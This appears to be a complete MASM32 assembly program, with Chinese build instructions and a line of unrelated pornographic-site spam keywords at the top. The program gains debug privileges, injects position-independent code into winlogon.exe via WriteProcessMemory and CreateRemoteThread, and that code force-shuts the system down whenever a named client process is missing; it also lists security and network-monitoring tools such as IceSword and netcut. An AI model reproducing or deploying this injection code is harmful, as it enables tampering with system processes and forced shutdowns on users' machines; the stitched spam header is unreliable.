九色国产,午夜在线视频,新黄色网址,九九色综合,天天做夜夜做久久做狠狠,天天躁夜夜躁狠狠躁2021a,久久不卡一区二区三区

;點(diǎn)擊上面的構(gòu)建菜單，先編譯再構(gòu)建就可以了，因?yàn)橹挥幸粋€進(jìn)程所以也懶得寫INI了，自己改下下面那個進(jìn)程名就行了
;要改的地方就在下面一點(diǎn)，如果你就RadAsm打開一下就看到下面那行黃色的字了
;http://www.pediy.com/tools/Compilers.htm
;編譯工具在上面的網(wǎng)址下載，(RadASM 2.2.1.2)就這個，不要新建工程，新建一個ASM文件就可以了
;______________________________________________________
.386
.model flat, stdcall
option casemap :none
;______________________________________________________
include  windows.inc
include  user32.inc
includelib user32.lib
include  kernel32.inc
includelib kernel32.lib
include  advapi32.inc
includelib advapi32.lib
;______________________________________________________
_EnablePrivilege  proto :DWORD,:DWORD
_GetPidFromProcName  proto :DWORD

.data?
lpLoadLibrary  dd ?
lpGetProcAddress  dd ?
lpGetModuleHandle  dd ?
dwProcessID  dd ?
dwThreadID  dd ?
hProcess  dd ?
lpRemoteCode  dd ?

.const
szSeDebugPrivilege db 'SeDebugPrivilege',0
;szwinlogon  db 'notepad.exe',0
szwinlogon  db 'winlogon.exe',0
szErrOpen  db '無法打開遠(yuǎn)程線程!',0
szDllKernel  db 'Kernel32.dll',0
szLoadLibrary  db 'LoadLibraryA',0
szGetProcAddress  db 'GetProcAddress',0
szGetModuleHandle  db 'GetModuleHandleA',0

;______________________________________________________
reverseArgs macro arglist:VARARG
  local txt,count
   
  txt TEXTEQU <>
  count = 0
 for i,<arglist>
         count = count + 1
         txt TEXTEQU @CatStr(i,<!,>,<%txt>)
 endm
 if count GT 0
         txt SUBSTR  txt,1,@SizeStr(%txt)-1
 endif
 exitm txt
endm
;______________________________________________________
_invoke  macro _Proc,args:VARARG
  local count
   
  count = 0
% for i,< reverseArgs( args ) >
  count = count + 1
  push i
 endm
  call dword ptr _Proc
   
endm
;______________________________________________________
  .code
;______________________________________________________
REMOTE_CODE_START equ this byte 

_lpLoadLibrary   dd ?
_lpGetProcAddress  dd ?
_lpGetModuleHandle  dd ?
;______________________________________________________
;user32.dll
;______________________________________________________
_lpDestroyWindow  dd ?
_lpPostQuitMessage  dd ?
_lpDefWindowProc  dd ?
_lpLoadCursor   dd ?
_lpRegisterClassEx  dd ?
_lpCreateWindowEx  dd ?
_lpFindWindowA   dd ?
_lpPostMessageA   dd ?
_lpShowWindow   dd ?
_lpUpdateWindow   dd ?
_lpGetMessage   dd ?
_lpTranslateMessage  dd ?
_lpDispatchMessage  dd ?
_lpSetTimer   dd ?
_lpMessageBoxA   dd ?
;______________________________________________________
;kernel32.dll
;______________________________________________________
_lpCreateToolhelp32Snapshot dd ?
_lpProcess32First  dd ?
_lplstrcmp   dd ?
_lpSleep   dd ?
_lpOpenProcess   dd ?
_lpTerminateProcess  dd ?
_lpProcess32Next  dd ?
_lpCloseHandle   dd ?
;______________________________________________________
;ntdll.dll
;______________________________________________________
_lpRtlAdjustPrivilege  dd ?
_lpNtShutdownSystem  dd ?
;______________________________________________________

_hProcess   dd ?
_hSnapShot   dd ?
_hInstance   dd ?
_hWinMain   dd ?
_stProcess  PROCESSENTRY32 <?>

_scCmd    db 'Client.exe',0   ;這個cmd.exe就是要保護(hù)的進(jìn)程,改成計費(fèi)系統(tǒng)的進(jìn)程就可以了
_szDllUser   db 'User32.dll',0
_szDllUserkernel32  db 'kernel32.dll',0
_szDllNtdll   db 'ntdll.dll',0
;______________________________________________________
;kernel32.dll
;______________________________________________________
_szCreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',0
_szProcess32First  db 'Process32First',0
_szlstrcmp   db 'lstrcmpA',0
_szSleep   db 'Sleep',0
_szOpenProcess   db 'OpenProcess',0
_szTerminateProcess  db 'TerminateProcess',0
_szProcess32Next  db 'Process32Next',0
_szCloseHandle   db 'CloseHandle',0,0
;______________________________________________________
_szText   db 'Mr.Fox',0
_szClassName  db 'RemoteClass',0
_szCaptionMain  db 'RemoteWindow',0
_szNotepad  db 'notepad',0
_szQQ   db '444705607_QQMusic_SmallClient',0
_system32  db 'system32',0
_command  db 'command$ 在 WXNT.CN (192.168.0.253) 上',0

_IceSword  db 'IceSword.exe',0
_P2pover  db 'p2pover.exe',0
_Netrobocop  db 'Netrobocop.exe',0
_SuperLANadmin  db 'SuperLANadmin.exe'
_Robocop  db 'Robocop.exe',0
_Netsense  db 'Netsense.exe',0
_Netcut   db 'netcut.exe',0

;______________________________________________________
;user32.dll
;______________________________________________________
_szDestroyWindow db 'DestroyWindow',0
_szPostQuitMessage db 'PostQuitMessage',0
_szDefWindowProc db 'DefWindowProcA',0
_szLoadCursor  db 'LoadCursorA',0
_szRegisterClassEx db 'RegisterClassExA',0
_szCreateWindowEx db 'CreateWindowExA',0
_szFindWindowA  db 'FindWindowA',0
_szPostMessageA  db 'PostMessageA',0
_szShowWindow  db 'ShowWindow',0
_szUpdateWindow  db 'UpdateWindow',0
_szGetMessage  db 'GetMessageA',0
_szTranslateMessage db 'TranslateMessage',0
_szDispatchMessage db 'DispatchMessageA',0
_szSetTimer  db 'SetTimer',0
_szMessageBoxA  db 'MessageBoxA',0,0
;______________________________________________________
;ntdll.dll
;______________________________________________________
_szRtlAdjustPrivilege db 'RtlAdjustPrivilege',0
_szNtShutdownSystem db 'NtShutdownSystem',0,0
;______________________________________________________
_RemoteThread proc uses ebx edi esi lParam
  local @sc
  call @F
 @@:
  pop ebx
  sub ebx,offset @B
;______________________________________________________
;user32.dll
  lea eax,[ebx + offset _szDllUser]
  _invoke [ebx + _lpGetModuleHandle],eax
  mov @sc,eax
  lea esi,[ebx + offset _szDestroyWindow]
  lea edi,[ebx + offset _lpDestroyWindow]
 .while TRUE
  _invoke [ebx + _lpGetProcAddress],@sc,esi
  mov [edi],eax
  add edi,4
 @@:
  lodsb
  or al,al
  jnz @B
 .break .if ! byte ptr [esi + 1]
 .endw
;______________________________________________________
;kernel32.dll
  lea eax,[ebx + offset _szDllUserkernel32]
  _invoke [ebx + _lpGetModuleHandle],eax
  mov @sc,eax
  lea esi,[ebx + offset _szCreateToolhelp32Snapshot]
  lea edi,[ebx + offset _lpCreateToolhelp32Snapshot]
 .while TRUE
  _invoke [ebx + _lpGetProcAddress],@sc,esi
  mov [edi],eax
  add edi,4
 @@:
  lodsb
  or al,al
  jnz @B
 .break .if ! byte ptr [esi + 1]
 .endw
;______________________________________________________
;ntdll.dll
  lea eax,[ebx + offset _szDllNtdll]
  _invoke [ebx + _lpGetModuleHandle],eax
  mov @sc,eax
  lea esi,[ebx + offset _szRtlAdjustPrivilege]
  lea edi,[ebx + offset _lpRtlAdjustPrivilege]
 .while TRUE
  _invoke [ebx + _lpGetProcAddress],@sc,esi
  mov [edi],eax
  add edi,4
 @@:
  lodsb
  or al,al
  jnz @B
 .break .if ! byte ptr [esi + 1]
 .endw
;______________________________________________________
  
 .while TRUE

  _invoke [ebx + _lpSleep],1000
  
  call _Process
 .endw
  

  ret

_RemoteThread endp
;______________________________________________________
_Process proc
  local @stProcess:PROCESSENTRY32
  local @scCmd
  local @ExeFile
  
  
  call @F
  @@:
  pop ebx
  sub ebx,offset @B
;______________________________________________________
  _invoke [ebx + _lpCreateToolhelp32Snapshot],TH32CS_SNAPPROCESS,0
  mov [ebx + _hSnapShot],eax
  mov @stProcess.dwSize,sizeof @stProcess
  lea eax,@stProcess
  _invoke [ebx + _lpProcess32First],[ebx + _hSnapShot],eax
 .while  eax   != 0
  mov esi,FALSE
  lea eax,@stProcess.szExeFile
  mov @ExeFile,eax
  lea eax,[ebx + offset _scCmd]
  mov @scCmd,eax
  
  _invoke [ebx + _lplstrcmp],@scCmd,@ExeFile
  .if eax == 0
  
   mov esi,TRUE
   
   .break
   
  .endif
  lea eax,@stProcess
  _invoke [ebx + _lpProcess32Next],[ebx + _hSnapShot],eax
 .endw
  _invoke [ebx + _lpCloseHandle],[ebx + _hSnapShot]
  
 .if esi != TRUE
 
  call _Shutdown
 .endif
  mov esi,FALSE
  
  ret
_Process endp
;______________________________________________________
_Shutdown Proc

  call @F
  @@:
  pop ebx
  sub ebx,offset @B
;______________________________________________________
  _invoke [ebx + _lpRtlAdjustPrivilege],13h,1h,0h,esp
  _invoke [ebx + _lpNtShutdownSystem],0

_Shutdown endp
;*******************************************************************
REMOTE_CODE_END  equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
;______________________________________________________
start:
  invoke GetModuleHandle,addr szDllKernel
  mov ebx,eax
  invoke GetProcAddress,ebx,offset szLoadLibrary
  mov lpLoadLibrary,eax   
  invoke GetProcAddress,ebx,offset szGetProcAddress
  mov lpGetProcAddress,eax
  invoke GetProcAddress,ebx,offset szGetModuleHandle
  mov lpGetModuleHandle,eax
;______________________________________________________

  invoke  _EnablePrivilege,offset szSeDebugPrivilege, TRUE
 
  invoke  _GetPidFromProcName,offset szwinlogon
  invoke  OpenProcess, PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE, FALSE, eax  
  
 .if eax
  mov hProcess,eax
  invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
 .if eax
  mov lpRemoteCode,eax
  invoke WriteProcessMemory,hProcess,lpRemoteCode,\
   offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,NULL
  invoke WriteProcessMemory,hProcess,lpRemoteCode,\
   offset lpLoadLibrary,sizeof dword * 3,NULL
  mov eax,lpRemoteCode
   add eax,offset _RemoteThread - offset REMOTE_CODE_START
  invoke CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULL
  invoke CloseHandle,eax
 .endif
  invoke CloseHandle,hProcess
 .else
  invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
 .endif
  invoke ExitProcess,NULL
;______________________________________________________
_EnablePrivilege proc  szPriv:DWORD, bFlags:DWORD
  local   hToken
  local   tkp : TOKEN_PRIVILEGES
 
  invoke  GetCurrentProcess
  mov edx,eax
  invoke  OpenProcessToken,edx,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
  invoke  LookupPrivilegeValue,NULL,szPriv,addr tkp.Privileges.Luid
  mov tkp.PrivilegeCount, 1
  xor eax,eax
 .if  bFlags
  mov eax,SE_PRIVILEGE_ENABLED
 .endif
  mov tkp.Privileges.Attributes, eax
  invoke  AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
  push    eax
  invoke  CloseHandle, hToken
  pop eax
  ret
_EnablePrivilege endp
;_____________________________________________________________
_GetPidFromProcName proc lpProcName:DWORD
  local stProcess : PROCESSENTRY32
  local hSnapshot
  local @dwProcessID
 

  
  mov  @dwProcessID, 0
  invoke RtlZeroMemory, addr stProcess, sizeof stProcess
  mov stProcess.dwSize, sizeof stProcess
  invoke  CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
  mov hSnapshot, eax
  invoke  Process32First, hSnapshot, addr stProcess
 .while  eax
  invoke  lstrcmpi, lpProcName, addr stProcess.szExeFile
  .if eax==0
   mov eax, stProcess.th32ProcessID
   mov @dwProcessID, eax
   .break
  .endif
  invoke  Process32Next, hSnapshot, addr stProcess
 .endw
  invoke  CloseHandle, hSnapshot
  mov eax, @dwProcessID
  ret
_GetPidFromProcName  endp
;_______________________________________________________

  end start
;______________________________________________________